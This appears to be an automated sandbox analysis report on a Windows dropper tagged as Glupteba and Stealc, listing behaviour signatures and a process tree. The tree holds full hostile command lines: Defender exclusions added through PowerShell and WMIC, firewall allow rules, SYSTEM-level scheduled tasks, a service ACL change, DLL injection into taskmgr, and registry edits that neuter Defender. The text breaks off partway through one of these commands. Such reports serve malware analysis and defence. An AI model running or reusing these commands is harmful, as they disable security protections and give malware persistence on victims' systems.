Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
-
submitted
25-04-2024 08:34
General
-
Target
f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe
-
Size
789KB
-
MD5
8026082d59bac905bcc4098c69b98743
-
SHA1
5c8bffce653aa3b6c3e14d5f02927648b5ca8768
-
SHA256
f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005
-
SHA512
304339d26694f1225a23014862676f759c9332ea43ab53c9cb665346228dbed5ece4dca5e41b4d577fdf18ea70f7c61cda852e5122a7fbcf3bdfec5acc0f9f42
-
SSDEEP
12288:UsP3NrvWMBOyImjR4rrRyimS3lE28kNp6MARWch8kMp5okT23gvub5mqn6Ec0Lhy:UsP3NrvW31m9Ysd9lgvu4q6EgtOt3F3u
Malware Config
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 14 IoCs
-
Modifies firewall policy service 2 TTPs 1 IoCs
-
Stealc
Stealc is an infostealer written in C++.
-
UAC bypass 3 TTPs 1 IoCs
-
Windows security bypass 2 TTPs 7 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 8 IoCs
-
Executes dropped EXE 27 IoCs
-
Loads dropped DLL 10 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 9 IoCs
Detects Themida, an advanced Windows software protection system.
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Windows security modification 2 TTPs 8 IoCs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Drops file in System32 directory 31 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Program Files directory 6 IoCs
-
Drops file in Windows directory 10 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies system certificate store 2 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 7 IoCs
-
Suspicious use of SendNotifyMessage 7 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 1 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe"C:\Users\Admin\AppData\Local\Temp\f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe"1⤵
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\dzSaCQACAjyLW3MZo75AHk4b.exe"C:\Users\Admin\Pictures\dzSaCQACAjyLW3MZo75AHk4b.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\u3s0.0.exe"C:\Users\Admin\AppData\Local\Temp\u3s0.0.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 10125⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\u3s0.2\run.exe"C:\Users\Admin\AppData\Local\Temp\u3s0.2\run.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\u3s0.3.exe"C:\Users\Admin\AppData\Local\Temp\u3s0.3.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 14364⤵
- Program crash
-
C:\Users\Admin\Pictures\xqFR9DclKTs7bU8XGwKY57e3.exe"C:\Users\Admin\Pictures\xqFR9DclKTs7bU8XGwKY57e3.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\xqFR9DclKTs7bU8XGwKY57e3.exe"C:\Users\Admin\Pictures\xqFR9DclKTs7bU8XGwKY57e3.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\kubHbUH22R5cJMfEfeEVON21.exe"C:\Users\Admin\Pictures\kubHbUH22R5cJMfEfeEVON21.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\kubHbUH22R5cJMfEfeEVON21.exe"C:\Users\Admin\Pictures\kubHbUH22R5cJMfEfeEVON21.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\FMRHImqKyRfmTuFwEnMaRCJU.exe"C:\Users\Admin\Pictures\FMRHImqKyRfmTuFwEnMaRCJU.exe"3⤵
- Modifies firewall policy service
- Windows security bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Z7gEesF5i729dkMqNVYOlP1M.exe"C:\Users\Admin\Pictures\Z7gEesF5i729dkMqNVYOlP1M.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Users\Admin\Pictures\Z7gEesF5i729dkMqNVYOlP1M.exeC:\Users\Admin\Pictures\Z7gEesF5i729dkMqNVYOlP1M.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6f5fe1d0,0x6f5fe1dc,0x6f5fe1e84⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z7gEesF5i729dkMqNVYOlP1M.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z7gEesF5i729dkMqNVYOlP1M.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Z7gEesF5i729dkMqNVYOlP1M.exe"C:\Users\Admin\Pictures\Z7gEesF5i729dkMqNVYOlP1M.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4260 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240425083612" --session-guid=81d1ba6b-8224-4cd6-b44f-731029a6c7ed --server-tracking-blob="MWU2YWI3NWM0YmMyMGNkOTJlMDcxMmU4ODAzMTJjZWE3OWI4NWMwYzNlM2RhZmJiMTk0NTI0YWIxOWIwYmVmZDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fMTIzIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MDM0MTAwLjc2MDkiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzEyMyIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMWFjMTBhYjktZGEwMi00NGUxLTkyN2UtZDFhZWU0YmNmNDQxIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=68050000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\Z7gEesF5i729dkMqNVYOlP1M.exeC:\Users\Admin\Pictures\Z7gEesF5i729dkMqNVYOlP1M.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x2b0,0x2b4,0x2b8,0x280,0x2bc,0x6ccee1d0,0x6ccee1dc,0x6ccee1e85⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404250836121\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404250836121\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404250836121\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404250836121\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404250836121\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404250836121\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x220,0x224,0x228,0x200,0x22c,0xdd6038,0xdd6044,0xdd60505⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\xEXmzcXoDuSVy5Lb18Lv0n45.exe"C:\Users\Admin\Pictures\xEXmzcXoDuSVy5Lb18Lv0n45.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC723.tmp\Install.exe.\Install.exe /RvdidblCuX "385118" /S4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 08:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\BJCTcar.exe\" em /fIsite_idbPq 385118 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\oiy1vPScVPH1BoLNrDBhvei7.exe"C:\Users\Admin\Pictures\oiy1vPScVPH1BoLNrDBhvei7.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS841A.tmp\Install.exe.\Install.exe /RvdidblCuX "385118" /S4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 08:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\UUhghxb.exe\" em /IQsite_idUhx 385118 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1720 -ip 17201⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4896 -ip 48961⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\BJCTcar.exeC:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\BJCTcar.exe em /fIsite_idbPq 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 